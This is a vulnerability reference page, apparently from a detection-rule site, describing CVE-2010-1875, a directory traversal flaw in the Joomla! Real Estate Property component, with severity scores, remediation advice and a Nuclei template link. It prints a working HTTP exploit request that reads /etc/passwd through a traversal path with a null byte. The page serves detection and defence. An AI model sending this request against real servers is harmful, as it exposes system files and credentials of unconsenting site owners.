🔙 목록으로 돌아가기

CVE-2010-1875: Joomla! Component Property - Local File Inclusion

TitleJoomla! Component Property - Local File Inclusion
Authordaffainfo
SeverityHigh
ImpactThis vulnerability can result in the exposure of sensitive data, such as configuration files, database credentials, or other sensitive information stored on the server.
RemediationTo remediate this vulnerability, it is recommended to update the affected Joomla! component to the latest version or apply the necessary patches provided by the vendor.
CVSS Score7.5
EPSS Score0.01575
CVE IDCVE-2010-1875
CWE IDCWE-22
Tags cve2010 cve joomla lfi edb com-property vuln

🔍 Vulnerability Description

A directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.

🌐 HTTP Request

GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6,2 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2010/CVE-2010-1875.yaml

🦈 Packet Capture: ⬇️ Download cve-2010-1875.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A